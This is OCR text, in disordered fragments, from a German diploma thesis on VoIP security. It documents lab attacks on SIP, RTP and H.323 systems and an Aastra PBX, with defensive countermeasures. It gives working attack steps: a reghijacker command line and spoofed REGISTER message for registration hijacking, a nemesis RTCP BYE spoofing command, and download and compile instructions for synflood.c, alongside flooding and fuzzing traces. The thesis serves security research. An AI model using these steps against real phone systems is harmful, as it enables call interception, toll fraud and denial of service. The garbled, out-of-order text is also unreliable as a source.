ber den PC des Angreifers gelenkt werden k nnen Dieser kommt in Kenntnis des Inhaltes von Daten respektive Medienstreams Je nach Inhalt dieser Daten k nnen die so erfsnifften Informationen f r weitere Angriffe eingesetz
131. OIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 53 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 7 2 Technik und Funktionsweise Um mit SiVus einen gef lschten gespooften Register Request senden zu k nnen welcher zum Registration Hijacking f hrt m ssen zuerst mittels eines Netzwerkmonitors die Registrierungsdaten der potentiellen Angriffsziele aufgezeichnet respektive in Erfahrung gebracht werden Mit diesen ersnifften Registrations Daten kann dann in SiVus ein gespoofter Register Request erstellt und abgesendet werden Je nach gew nschtem Angriff wird die zu sendende Nachricht anders parametrisiert Damit der Angreifer die ber das Netzwerk gesendeten Registrierungsdaten eines User Agents sniffen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Dieses Beispiel zeigt ein Registration Hijacking in einem unauthentifizierten Netzwerk auf Das heisst die User Agents m ssen sich zur Registrierung nicht authentifizieren Im n chsten Beispiel Kapitel 2 8 1 wird eine Variante aufgezeigt wo Registration Hijacking im authentifizierten Netzwerk vollzogen wird 2 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer ist mit dem Netzwerk verbunden hat Wireshark gestartet und zeichnet den ganzen Netzwerkverkehr auf User Agent 4119 startet seinen periodischen Register Request Wie zuvor schon einmal geschrieben
132. P SDP Request INVITE Sipiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiioiiiiiin 1070 29 367177 10 1 1 107 10 1 1 101 STP SDP Request INVITE Sipiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiniiiiiin t o S r N P gt y as y r u 10 1 1 107 10 1 1 101 Fragmented IP protocol proto uDP 0x11 off 0 1073 29 575428 10 1 1 107 10 1 1 101 Fragmented IP protocol proto UDP 0x11 off 0 1075 29 679812 10 1 1 107 10 1 1 101 Fragmented IP protocol proto UDP 0x11 off 0 2 13 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Das Fuzzen der Terminals und SIP Proxy Server bringt diese teilweise in einen instabilen Zustand oder sogar zum Absturz W hrend der Angriffe waren vielfach die blichen Funktionen des Angriffzieles nicht verf gbar Gelingt ein Angriff auf das Herzst ck die VOIP PBX oder der SIP Proxy Server so kann dieser Angriff die ganze Telefon Infrastruktur zum erliegen bringen DoS Denial of Service Mit jeder durch Protos gesendeten INVITE Nachricht beginnt das zu fuzzende Terminal neu mit Klingeln Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 82 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 3 IAX IAX2 Inter Asterisk eXchange Protocol Einf hrung Das IAX Protokoll wird von der Open Source PBX Asterisk benutzt und kann dabei zur Kommunikation zwischen einzelnen Asterisk Servern oder f r die Kommunikation mit den Terminals eingesetzt werden
133. Port die Meldung abgesetzt werden soll y 14750 An welches Port die Meldung gesendet werden soll ersnifft mit Portscanner S IP Adresse des zu spoofenden Clients Servers D Angriffsziel H MAC Adrese des zu spoofenden Clients Servers M MAC Adresse des Angriffziels P iSEC RTCP BYE DOS Integration Vorlage RTCP Paket nenes 750 y 14750 S P iSEC RTCP 10 1 1 129 M 00 14 27 UDP Packet Injection MAC Ethernet type ag o 0x00 09 IF Fr aq UDP 14750 gt 14750 Wrote 50 byte U et through linktype OLT UDP Packet Injecte Paket Nr 8189 ist das gespoofte RTCP BYE Paket welches vom Angreifer an das Angriffsziel Asterisk Proxy Server gesendet wurde Zu sehen ist dass die IP und MAC Adresse gespooft im Namen von User Agent 4129 an das Angriffsziel gesendet wurden Vergleicht man die die IP ID des obigen Angriffslogs mit dem Identification Eintrag des untenstehenden Wiresharktraces stellt man fest dass es sich dabei um dasselbe Paket mit der ID 45130 handelt Ansonsten ist nicht festzustellen dass dieses Paket vom Angreifer stammt a Trace geflootet 2b Paket 81 pcap Wires File Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply No Time Source Destination Protocol Info EEUE E LE EEEE AEE 10I oe Sour SEE PERS U pores 47s 8190 40 44 O 10 1 121 10 1 1 101 DIS a port hbci i 16600 Desti 8191 40 44 1 101 10 1 1 m Frame 8189 50 bytes
134. Port identisch sind Das Zielsystem sendet die Antwort immer an sich selbst was zu einer berlast f hrt Die Verf gbarkeit des Systems wird dadurch stark eingeschr nkt oder g nzlich ausgeschaltet Switch mit massenhaft vielen Anfragen berh ufen die jeweils unterschiedlich gesendeten MAC Adressen werden in der internen Tabelle gespeichert Wenn Tabelle komplett berf llt ist wechselt Switch in Failopen Mode und arbeitet wie ein HUB Alle Pakete werden an alle Ports gesendet und sind leicht abh rbar Vort uschen einer falschen MAC Adresse die MAC Adresse des anzugreifenden Objektes wird im Rechner des Angreifers eingegeben und somit eine falsche Identit t vorget uscht Datenpakete werden somit an den Rechner des Angreifers gesendet Das Media Gateway Control Protokoll ist ein Netzwerkprotokoll zur Steuerung von VOIP Gateways Auch Man in the middle genannt und hat zum Ziel s mtlichen Datenstrom ber den eigenen PC zu lenken um Daten aufzeichnen manipulieren und aussp hen zu k nnen Dieser Call Manager aus dem Hause Aastra Telecom Schweiz AG bietet volle Voice over IP Funktionalit t f r die Nutzung des betriebsinternen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 211 PING Flood RCTP Route Injection RTP SDP SIP Skinny Skype STP Attacken SYN Flood Verf gbarkeit Vertraulichkeit VLAN Hopping VOIP oo Berner Fachhochschule bee Technik und Informatik Softwar
135. RP Spoofing MAC Spoofing MAC Flooding STP Attacken VLAN Angriffe Layer 3 Attacken im Netzwerk PING Flood IP Spoofing ICMP Redirect Route Injection IRDP Spoofing DHCP Starvation DHCP Rouge Server Layer 4 Attacken im Netzwerk SYN Flood LAND Flood Als weitere Hauptaufgabe soll aus den Erkenntnissen der oben geforderten Analysen und Angriffe gegen Signalisierungs und Medientransportprotokolle sowie Netzwerkinfrastruktur gezielt die Sicherheit der PBX Ascotel Intelligate der Firma Aastra Telecom Schweiz AG analysiert und angegriffen werden Es soll untersucht werden ob und in welchem Ausmass die PBX Ascotel im Bezug auf Sicherheit und Verfiigbarkeit verwundbar ist Die gewonnen Erkenntnisse und aufgezeichneten Logs sind ebenfalls zu dokumentieren Die Angriffe sind gegen folgende Komponenten und Verbindungen zu tatigen Verbindungen tiber die VOIP Apparate der Serie 60 70 80 IP Verbindungen tiber die SIP Apparate der Serie 51 53 57 IP Verbindungen abgehend ankommend ber Softphone 2380 IP Verbindungen abgehend ankommend via MediaSwitch Verf gbarkeit amp Angriffssicherheit Ethernetschnittstelle MediaSwitch Alle zu t tigenden Analysen und Angriffe sind innerhalb der eigenen Netzwerkinfrastruktur respektive Testumgebung auszuf hren Nicht selten werden solche Angriffe innerhalb des eigenen IP Netzes ausge bt sei es b swillig oder als Folge gelangweilter Mitarbeiter Angriffe von ausserhalb des eigenen N
136. Registrar er ffneten Namen der Benutzerkonten auch gleich den internen Rufnummern entsprechen dies ist meistens so und dass die Registrierung dieser User Agents ohne jegliche Authentifizierung stattfindet Somit kann jeder der Zugang zum Netzwerk hat lokal vor Ort oder via Internet durch zuvor eingeschleusten Virus oder Trojaner und in Kenntnis einer dieser g ltigen User Accounts ist sich unter falscher Identit t registrieren Die Response Nachricht 401 f r den User Agent 4119 sagt aus dass es zwar einen g ltigen Benutzeraccount gibt sich jedoch der anzumeldende User Agent mittels Passwort beim Registrar authentifizieren muss 2 34 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Ein Angreifer kann eine falsche ID vort uschen sich als jemand anderen ausgeben nachdem er sich ohne Authentifizierung beim SIP Proxy Server anmelden konnte Der Angreifer bekommt Anrufe Kenntnisse von Anrufen welche nicht f r ihn bestimmt sind Je nach Verhalten des SIP Proxy Servers Registrars wird der zuvor unter derselben Nummer registrierte User Agent unregistriert Weiter telefoniert der Angreifer auf fremde Kosten die Gespr chsgeb hren werden voll dem offiziellen User Account belastet 2 3 2 2 SIPSCAN INVITE Scan Technik und Funktionsweise Mit dem INVITE Scan ist es m glich s mtlichen User Agents welche im File users txt definiert wurden eine INVITE Nachricht zu senden Das heisst jedes aktue
137. Registrationsdauer SEMENO Da erstens keine g ltige Contact Information mehr f r User Agents 4129 vorhanden ist und zweitens die Registrationsdauer 0 Sekunden betr gt ist dieser User Agents 4129 unregistriert Zur Erinnerung Expires sagt aus wie lange die Registration eines User Agents g ltig ist bis er sich wieder neu registrieren muss Mittels falscher Contact Information MIEHEIEOSSHAERIEHNHER wird dann daf r gesorgt dass Anrufe f r den User Agent 4129 bei User Agent 4111 rufen STEREO ist die Meldung welche jeweils vom Registrar zur ck gesendet und best tigt wird dass die mit dem Tool Registration Hijacker gesendete Nachricht korrekt ist und ausgef hrt worden war Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 59 KKK bt reghijacker ethO 10 1 1 101 10 1 1 101 4111 10 1 1 121 results u 4129 10 1 1 29 p 1234 v Registration Hijacker Version 1 0 09 09 2004 REGISTER sip 10 1 1 101 SIP 2 0 Via SIP 2 0 UDP 10 1 1 107 15002 branch ac6de608 e1f6 4494 b192 61a2bafe3b50 From 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt tag ac6e1bba e1f6 4494 97ad 2e815bfb7729 To 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt Call ID ac6e4bO1 e1f6 4494 af41 fal3a29ddf91 CSeq 1 REGISTER Max Forwards 70 Content Length 0 Via SIP 2 0 UDP 10 1 1 107 15002 branch ac6de608 e 1 f6 4494 b 192 6 la2bafe3b50 received 10 1 1 107 From 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 10
138. SIP Session Initiation Protocol Einf hrung 27 2 1 1 SIP Architektur 27 2 1 2 SIP Nachrichten 27 2 1 3 SIP Meldungen 28 2 1 4 SIP Responses 29 2 1 5 Exemplarischer Verbindungsaufbau in SIP 30 2 1 6 Exemplarischer Registrierungsablauf eines User Agents in SIP 31 2 2 1 Enumeration SIP User amp Extension mit zenmap 32 2 2 2 Technik und Funktionsweise 33 2 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 33 2 2 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 34 2 3 1 Enumeration SIP User amp Extension mit SIPSCAN 35 2 3 2 SIPSCAN REGISTER Scan Technik und Funktionsweise 36 2 3 3 __ Ausgangssituation Ablauf und Bedingungen f r Angriff 36 2 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 37 2 3 2 a SIPSCAN INVITE Scan Technik und Funktionsweise 37 2 3 3 6 Ausgangssituation Ablauf und Bedingungen f r Angriff 37 2 3 4 c Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 40 2 4 1 Vendor specific web search 41 2 4 2 Technik und Funktionsweise 42 2 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 42 2 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 43 2 5 1 SIP Authentication Attack mit Cain amp Abel 44 2 5 2 Technik und Funktionsweise 45 2 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 45 2 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel
139. SIP Authentication Attack Integrit t ee an Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x SIPcrack Downloadlink Quelle des Tools Schweregrad http www remote exploit org 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse User Agents haben sich je nach Konfiguration des Registrars entweder unauthentisiert oder authentisiert bei diesem anzumelden Ziel dieses Angriffes ist es eine Authentifizierung mitzusniffen mitschneiden um daraus dann die Registrierungsinformationen ableiten zu k nnen Die so erworbenen Informationen k nnen f r ein Registrations Hijacking verwendet werden indem der Angreifer ein eigenes Terminal mit den gestohlenen Registrationsdaten ins Netzwerk bringt Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vorkommen auch wenn diese zum Beispiel am Schluss noch mit zwei Zahlen versehen werden z Bsp Spanien08 UNSICHER Sichere Passw rter enthalten Sonderzeichen Gross und
140. Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 6 11 1 DoS SYN Flood Integritat ER etree teeter rae Vertraulichkeit Eingesetztes Tool Verf gbarkeit x synflood c Downloadlink Quelle des Tools Schweregrad http www infosecprofessionals com code synflood c 1 leicht 6 schwer Hinweise zu Installation Verfiigbarkeit Installation Tool 4 Anwendung Tool 5 Das Tool ist in BackTrack3 nicht enthalten Nach dem Herunterladen Erforderliche Vorkenntnisse 5 ist das Tool wie folgt zu kompilieren Gcc o synflood synflood c Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Der Angreifer sendet eine sehr grosse Menge TCP Verbindungsanfragen an das Angriffsziel Dabei geht es nicht darum die Bandbreite des Netzwerkes zu belegen sondern die Verf gbarkeit und Performance des Angriffsziels zu stoppen respektive einzuschr nken Das Angriffsziel wird dadurch nicht mehr erreichbar sein oder zumindest die anstehenden Aufgaben wie zum Beispiel das Weiterleiten der RTP Sprachpakete oder Abarbeiten der Verbindungsanfragen nicht mehr fristgerecht erledigen k nnen Der ganze Telefonie Service kommt somit zum Erliegen DoS Denial of Service Schutz gegen Angriff Analyse Switche mit DoS Detektoren verwenden welche solche Angriffe unterbinden Siehe Massnahmen SYN Fl
141. Servers w hrend dem Flooding Untenstehender Wireshark Trace zeigt das Verhalten zweier sich in Kommunikation befindlichen User Agents Sobald das Flooding der INVITE Nachrichten einsetzt ab Paket Nr 2872 ist bei beiden User Agents kein Audio mehr h rbar Ab diesem Moment besch ftig sich der SIP Proxy Server ausschliesslich mit dem Verarbeiten der INVITE Anfragen Es werden keine RTP Pakete mehr zu den User Agents vermittelt GB 4129 war mit 4111 im Gesprach als Flooding einsetze pcap Wireshark eo u 7 P or awe Ty P 7 F n oo Se File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 2869 27 460265 vmware_55 dd b4 Broadcast who has 10 1 1 101 Tell 10 1 1 107 2870 27 460467 Dell_f0 22 43 Vmware_55 dd b4 10 1 1 101 is at 00 14 22 f0 22 43 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 75 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Ab Paket Nr 15710 ist dann der SIP Proxy Server nicht mehr erreichbar Die Verbindung zwischen den beiden User Agents bleibt in einem undefinierten Zustand Der SIP Proxy Server muss neu gestartet werden er erholt sich nicht von alleine nach dem Flooding Das Flooding erzeugt innert wenigen Sekunden ber 65 MB Datenverkehr welcher mit Wireshark aufgezeichnet wurde Dies l sst erahnen welcher Datenflut jeweils das Angriffsziel w hre
142. Summary Console Tasks BackTrack3 Performance Processors axa Memory Notes Hardware Um in der Console BackTrack3 zu starten ist mit der Maus in die 2 weissen Quadrate zu doppelklicken wu VMware Infrastructure Web Access Administrator testsrv Application Virtual Machine Administration li p 6G O Help Virtual Appliance Marketplace Log Out Inventory SO BackTrack3 Summary Console Tasks Events Permissions Powered On LEN st role f 1 the console in a new window Klicker Click anywhere to open the vi Geschafft BackTrack3 ist betriebsbereit Angriff Tools k nnen entweder via Menu oder direkt in der Kommandozeile Rund Command aufgerufen werden Unter Devices sind der Netzwerkadapter und der USB Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 25 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Stick ersichtlich Rechts unten kann die Sprache f r die Tastatureinstellung vorgenommen werden Mit dem dritten Icon von links in der unteren Taskliste ist ein Datei Explorer verf gbar wie man es fast wie von Windows her kennt BackTrack3 VMware Remote Console Backtrack ee Documents Editors gt Internet lt gt Services gt Graphics SS Multimedia System Utilities ISN KSsnapshot GS Find Files Folders j Action SS Run Command E23 switch user I 4 Lock Session 3 I
143. TE RN Ee sii cians 11047 15 045307 10 1 1 101 93 189 87 140 TCP nttp gt dka RST ACK Ack 1 Win 0 Len 0 11048 15 045365 68 159 87 198 3023312107 TCP netmagic gt http SYN Seq 0 win 65535 Len 0 11049 15 045372 10 1 1 101 68 159 87 198 TCP ttp gt netmagic RST ACK Seg 1 Ack 1 win 0 Len 11050 15 045432 188 62 133 159 10 1 1 101 TCP bnetfile gt http SYN Seq lin 65535 Len 0 11051 15 045450 10 1 1 101 188 62 133 159 TCP nttp gt bnetfile RST ACK 1 Ack 1 win 0 Len 11052 15 045500 111 37 213 93 10 1 1 101 TCP watilapp gt http SYN Seq 0 win 65535 Len 0 11053 15 045518 10 1 1 101 111 37 213 93 TCP ttp gt watilapp LRST ACK Seg 1 Ack 1 win 0 Len 11054 15 045577 127 73 25 39 10 1 1 101 TER sweetware apps gt http SYN Seq 0 win 65535 Len 0 11055 15 045767 10 1 1 129 10 1 1 101 RTP PT ITU T G 711 PCMU SSRC 0x311A0B04 Seq 23594 11056 15 045835 186 9 75 18 10 1 1 101 TCP cajo discovery gt http SYN Seq 0 win 65535 Len 0 11057 15 045843 10 1 1 101 186 9 75 18 TCP nttp gt cajo discovery RST ACK Seq 1 Ack 1 Win 11058 15 045901 196 216 192 27 10 1 1 101 TCP seagull ais gt http SYN Seq 0 win 65535 Len 0 11059 15 045909 10 1 1 101 196 216 192 27 TCP nttp gt seagull ais RST ACK Seq l Ack 1 Win 0 L 11060 15 045968 168 92 145 46 101 TCP hp sci gt http SYN Seq 0 win 65535 Len 0 11061 15 045975 10 1 1 101 145 46 TCP ttp gt hp sci RST ACK Seg 1 Ack 1 win 0 Len 0 11062 15 046032 83 106 252 41 101 TCP hermes gt
144. TER OPTIONS etc an die User Agents Registrars Redirect Server oder Proxy Server gesendet um anhand deren Responses R ckschl sse auf Konfigurationsdetails oder vorhandene Sicherheitsl cher ziehen zu k nnen Der Einsatz dieses Tools wird dem Angreifer folgende Informationen liefern k nnen M ssen sich die User Agents gegen ber dem Registrar oder Proxy Server registrieren Gefundne User Accounts welche bei der Registrierung an den SIP Proxy Server keine Authentifizierung ben tigen k nnen einfach gestohlen und missbraucht werden Auch k nnen mittels dem Senden der INVITE Meldungen alle zur Zeit am Netzwerk angeschlossenen User Agents gleichzeitig zum Klingeln gebracht werden Dies verwirrt die Angriffsziele und kann je Anzahl der angeschlossenen Terminals bis hin zum Absturz des SIP Proxy Servers f hren was einem Dos Denial of Service Angriff gleich kommt Schutz gegen Angriff Analyse Eine wirksame Schutzmassnahme ist schwierig zu realisieren denn die Ports m ssen f r die korrekte Funktionalit t offen bleiben Einzige m gliche Massnahmen sind Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 35 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 3 2 SIPSCAN REGISTER Scan Technik und Funktionsweise Zuvor wurde mittels zenmap herausge
145. TP Real Time Control Protocol RCTP Beziiglich Attacken gegen Signalisierungs und Medientransport Protokolle soll nicht vorgeschrieben werden mit welchen Tools welche Angriffe ausgef hrt werden m ssen Die Auswahl und Suche geeigneter Tools soll als Teil der Diplomarbeit verstanden werden Es ist darauf zu achten dass diese Tools im Internet weit verbreitet und frei verf gbar sind Somit wird zus tzlich nochmals auf die Gefahr aufmerksam gemacht wie leicht es ist VOIP Verbindungen zu manipulieren oder abzuh ren M gliche einzusetzende und bereits schon vorhandene Tools sind in Kapitel 3 2 Software und Tools aufgelistet Die Signalisierungs und Sprachdaten von VOIP Verbindungen kommunizieren wie die Internetprotokolle ber IP TCP und UDP und nutzen dieselbe Netzwerkinfrastruktur Daher Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 213 oo Berner Fachhochschule tem Technik und Informatik Software Schule Schweiz gelten auch die gleichen Schwachstellen fiir VOIP wie wir sie von den IP Netzwerken her kennen Die meisten Angriffe auf VOIP Verbindungen zielen nicht direkt auf das Signalisierungs oder Medientransportprotokoll von VOIP selbst ab sondern auf die Netzwerkinfrastruktur Diese Angriffe sind ebenfalls zu analysieren festzuhalten und die erforderlichen Gegenmassnahmen aufzuzeigen Folgende Attacken sind auf untenstehenden Netzwerkebenen durchzufihren Layer 2 Attacken im Netzwerk A
146. V4 Addr port 10 1 1 101 5060 Verbose mode Packet 0000 52 45 47 49 53 54 45 52 20 73 69 70 3a 31 30 2e 0010 31 2e 31 2e 31 3031 20 53 49 50 2f 32 2e 30 Od 0020 0a 56 69 61 3a 20 53 49 50 2f 32 2e 30 2f 55 44 0030 50 20 31 30 2e 31 2e 31 2e 31 32 31 3b 62 72 61 0040 6e 63 68 3d 32 32 31 31 63 38 66 62 2d 64 34 30 0050 65 2d 34 34 39 34 2d 62 30 37 30 2d 65 38 63 33 0060 30 39 64 62 33 30 39 35 Od 0a 46 72 6f 6d 3a 20 0070 34 31 31 31 20 3c 73 69 70 3a 34 31 31 31 40 31 0080 30 2e 31 2e 31 2e 31 30 31 3e 3b 74 61 67 3d 32 0090 32 31 32 32 65 38 36 2d 64 34 30 65 2d 34 34 39 00a0 34 2d 61 31 35 34 2d 31 64 66 66 37 64 39 39 38 00b0 38 65 33 Od 0a 54 6f 3a 20 3c 73 69 70 3a 34 31 00c0 31 31 40 31 30 2e 31 2e 31 2e 31 3031 3e Od 0a 00d0 43 6f 6e 74 61 63 74 3a 20 2a Od 0a 53 75 70 70 00e0 6f 72 74 65 64 3a 20 72 65 70 6c 61 63 65 73 Od 00f0 Oa 43 61 6c 6c 2d 49 44 3a 20 32 32 31 32 36 31 0100 32 37 2d 64 34 30 65 2d 34 34 39 34 2d 62 31 31 0110 38 2d 63 65 31 65 30 62 36 30 37 61 35 65 0d 0a 0120 43 53 65 71 3a 20 31 30 30 20 52 45 47 49 53 54 0130 45 52 0d 0a 45 78 70 69 72 65 73 3a 20 30 0d 0a 0140 55 73 65 72 2d 41 67 65 6e 74 3a 20 48 61 63 6b 0150 65 72 0d 0a 4d 61 78 2d 46 6f 72 77 61 72 64 73 0160 3a 20 31 36 0d 0a41 6c 6c 6f 77 3a 20 49 4e 56 0170 49 54 45 2c 41 43 4b 2c 43 41 4e 43 45 4c 2c 42 0180 59 45 2c 4e 4f 54 49 46 59 2c 52 45 46 45 52 2c 0190 4f 50 54 49 4f 4e 53 2c 49 4e 46 4f 2c 53 55 42 01a0 53 43 52 49 42 45 Od 0a 43 6f 6
147. WARE TO THE VENDOR FROM WHICH YOU ACQUIRED IT WITHIN THIRTY 30 DAYS AND REQUEST A REFUND OF THE LICENSE FEE IF ANY ALREADY PAID UPON SHOWING PROOF OF PAYMENT YOU MEANS THE NATURAL PERSON OR THE I x lt Back Cancel__ Der Standard Installationspfad kann ausgew hlt werden in diesem Beispiel wurde der vorgegebene Pfad ausgew hlt Mittels next ist dieser zu best tigen fe YMware Server ag xj f Destination Folder Click Next to install to this Folder or click Change to install to a different folder Install Mware Server to lt ProgrammeiyMware yPlware Server Change Cancel Der FODN und die ben tigten Ports des Servers werden angezeigt es muss nichts eingegeben oder ver ndert werden Es kann zus tzlich gew hlt werden ob VMware beim Systemstart auch gleich automatisch gestartet werden soll Mittels next werden die Angaben best tigt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 19 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz j Mware Server Server Configuration Information l A j f Please enter server information Please select the virtual machine storage path C Wirtual Machinesi Change Please enter the server access information The Fully qualified domain name FQDN is the complete domain name for the host on the Internet The FODN includes the hostname and the domain na
148. Zielteilnehmer User Agent transportiert BYE Beendet eine bestehende Verbindung zwischen zwei User Agents Options Besagt welche SIP Meldungen und Codecs ein User Agent oder ein Server versteht Somit kann bei Verbindungsaufbau ein gemeinsamer Standard gefunden werden welcher von beiden Seiten verstanden wird ACK Es wird eine Best tigung gesendet dass der ankommende Ruf angenommen wurde ACK Acknowledge REGISTER Registriert einen User Agent bei einem Registrar gesendet wird diese Nachricht vom User Agent aus CANCEL L scht eine bereits initiierte INVITE Nachricht Ein User Agent kann somit seinen zuvor get tigten Verbindungsaufbau zu einem anderen User Agent wieder l schen INFO W hrend einer bestehenden Verbindung werden zus tzliche Informationen ausgetauscht 2 1 3 SIP Meldungen Eine typische SIP Meldung enth lt haupts chlich folgende Komponenten To Field Empf nger der SIP Meldung From Field Sender der SIP Meldung Call ID Field Eine eindeutige Nummer welche die Verbindung zwischen zwei User Agents referenziert Alle zu dieser Verbindung geh renden Meldungen werden mit dieser Call ID versehen Somit ist eine eindeutige Zuordnung dieser Meldung zur richtigen Kommunikation m glich CSeq Field Stellt sicher dass die richtige Reihenfolge beim Interpretieren der Meldungen an der jeweiligen Zieladresse eingehalten wird Dieser Z hler wird mit jeder weiteren Nachricht um eine inkrementiert Content Typ
149. acke gegen das MDS gehashte H 323 Passwort nicht mehr ausgef hrt werden Der Angriff wird zwecks Vollst ndigkeit trotzdem aufgef hrt 4 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Sniffen der Registrierungsdaten und dem Cracken des Passwortes kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit denselben Registrierungsdaten ins Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gemacht Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Auch kann er sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Terminal melden Zus tzlich kann der Angreifer kostenpflichtige Gespr che auf Kosten anderer f hren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 109 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 4 4 1 Denial of Service H 323 Reg Reject een Vertraulichkeit Eingesetztes Tool Verf gbarkeit x iSEC Registration Reject und nemesis Downloadlink Quelle des Tools Schweregrad http www isecpartners com voip_tools html 1 leicht 6 schwer Nemesis ist in BackTrack3 enthalten Hinweise zu Installation Verfiigbarkeit Installati
150. ag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag 24 11 2008 25 11 2008 26 11 2008 27 11 2008 28 11 2008 29 11 2008 30 11 2008 01 12 2008 02 12 2008 03 12 2008 04 12 2008 05 12 2008 06 12 2008 07 12 2008 08 12 2008 09 12 2008 10 12 2008 11 12 2008 12 12 2008 13 12 2008 14 12 2008 15 12 2008 16 12 2008 17 12 2008 18 12 2008 19 12 2008 20 12 2008 21 12 2008 22 12 2008 23 12 2008 24 12 2008 25 12 2008 26 12 2008 27 12 2008 28 12 2008 29 12 2008 30 12 2008 31 12 2008 01 01 2009 02 01 2009 03 01 2009 04 01 2009 05 01 2009 06 01 2009 07 01 2009 08 01 2009 09 01 2009 10 01 2009 11 01 2009 12 01 2009 13 01 2009 14 01 2009 15 01 2009 16 01 2009 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Angriffe gegen SIP Registration Hijacking Angriffe gegen SIP Registration Hijacking DoS Angriffe gegen SIP DoS und Flooding Attacken Installation Gnugk Gatekeeper verschiedene Gatekeeper versucht erfolglos Sitzung mit Betreuer Realisierungskonzept Angriffe auf RTP Angriffe auf RTP und H 323 Angriffe auf H 323 Angriffe auf RTP Angriffe auf H 323 viele erfolglos schlechte Tools Nachtests auf RTP Zwischenbericht Review mit Experte Nachtests H 323 Beginn mit der Dokumentation des Diplomberichtes Teilerstellung Dokumentation Diplombericht Teilers
151. aktion Nach Erkennung eines Ereignisses wird entweder aktiv oder passiv eine Reaktion ausgel st IDS Systeme k nnen netzwerkbasierend oder hostbasierend sein Je nach den zu sch tzenden Objekten ist die geeignete Wahl zu treffen Hersteller solcher Systeme sind www sipera com www securelogix com 8 5 16 Redundanz Redundante Kommunikationswege und Netzwerkkomponenten bieten bei Ausfall eines Weges oder Systems Ausweichm glichkeiten auf die jeweils redundante Infrastruktur 8 5 17 Sichere Netzwerkkomponenten Nur Netzwerkkomponenten mit aktueller Software und ausgef hrten Sicherheitspatches entsprechen dem heutigen Sicherheitsdenken System Hardening gt Nicht ben tigte Services und Leistungsmerkmale sollten ausgeschaltet werden Jeder ausgeschaltete Service bedeutet ein Angriffspunkt weniger im Netzwerk sicherheitsrelevante Services sind davon ausgeschlossen Implementierte Sicherheits Features sind zu nutzen auch wenn diese per default ausgeschaltet sind Default Administratoren Accounts sind zu deaktivieren oder durch ein sicheres Passwort zu ersetzen Remote Management Zug nge via Http oder Telnet sind mit Bedacht zu benutzen Mindestens ber ein sicheres Protokoll wie SSH oder SSL ist die Verbindung zu diesen aufzubauen Ebenfalls sind mittels Zugriffslisten ACL die User auf Management Konsolen einzuschr nken Sichere Passw rter welche regelm ssig ge ndert werden tragen sehr viel zur Netzwerksicherheit bei
